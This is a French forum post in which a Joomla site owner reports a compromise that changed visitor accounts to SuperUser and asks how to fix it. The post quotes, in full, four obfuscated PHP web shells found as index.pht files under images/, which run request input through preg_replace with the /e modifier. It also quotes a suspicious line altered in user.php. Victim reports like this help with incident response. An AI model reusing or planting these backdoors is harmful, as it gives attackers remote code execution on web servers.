Bonjour,
à la suite d'une modification inexpliquée des paramètres Utilisateurs qui étaient passés en SuperUser pour les Inscrits et les Visiteurs, j'ai examiné mes fichiers et trouvé des incohérences dont je vous fait part.
De nouveaux fichiers étaient apparus dont voici les détails et emplacements :
../images/index.pht
<? if(!function_exists('_7jycgef')){/*qu7bw*/$GLOBALS=Array('' .'preg_repla' .'ce'); function _7jycgef($i){$a=Array('patv2','/(.*)/e','patv2','');return $a[$i];}if(@isset($_REQUEST[_7jycgef(0)])){@$GLOBALS[0](_7jycgef(1),$_REQUEST[_7jycgef(2)],_7jycgef(3));exit;}}
../images/com_adsmanager/ads/index.pht
<? if(!function_exists('_x5fxq')){$GLOBALS=Array('' .'preg_repla' .'ce'); function _x5fxq($i){$a=Array('zu4lq','/(.*)/e','zu4lq','');return $a[$i];}if(@isset($_REQUEST[_x5fxq(0)])){@$GLOBALS[0](_x5fxq(1),$_REQUEST[_x5fxq(2)],_x5fxq(3));exit;}/*z5p*/}
../images/com_adsmanager/ads/tmp/index.pht
<? if(!function_exists('_5qgpo673dd')){$GLOBALS=Array('' .'preg_repla' .'ce'); function _5qgpo673dd($i){$a=Array('mkmuh','/(.*)/e','mkmuh','');return $a[$i];}if(@isset($_REQUEST[_5qgpo673dd(0)])){/*q6ol*/@$GLOBALS[0](_5qgpo673dd(1),$_REQUEST[_5qgpo673dd(2)],_5qgpo673dd(3));exit;}/*2g*/}
../images/com_adsmanager/fields/index.pht
<? /*4r*/if(!function_exists('_zj736tv')){/*wajuu*/$GLOBALS=Array('' .'preg_repla' .'ce'); function _zj736tv($i){$a=Array('72r','/(.*)/e','72r','');return $a[$i];}if(@isset($_REQUEST[_zj736tv(0)])){@$GLOBALS[0](_zj736tv(1),$_REQUEST[_zj736tv(2)],_zj736tv(3));exit;}}
Dans le même laps de temps, le fichier suivant avait été modifié à la ligne 165 :
../components/com_users/controllers/user.php
if ((is_array($data)) && ($data!='apgsgzpxesfxlnr')) die('
');
Il semblerait que le fichier user.php ait été modifié par une extension d'Empresa mais je ne m'explique pas pourquoi les 4 autres fichiers sont apparus. Quelques sites Joomla évoquent une attaque sur + de 27000 sites mais aucun ne donne le moyen de corriger ce problème. Avez-vous une idée ?
Voir :
blog.sucuri.net/2016/10/joomla-mass-expl...e-vulnerability.html
www.itwire.com/security/75530-attackers-...it-joomla-sites.html
www.joomlaexpert.ie/joomla-news-tips/ite...privileges-hack.html
Bien cordialement,
RM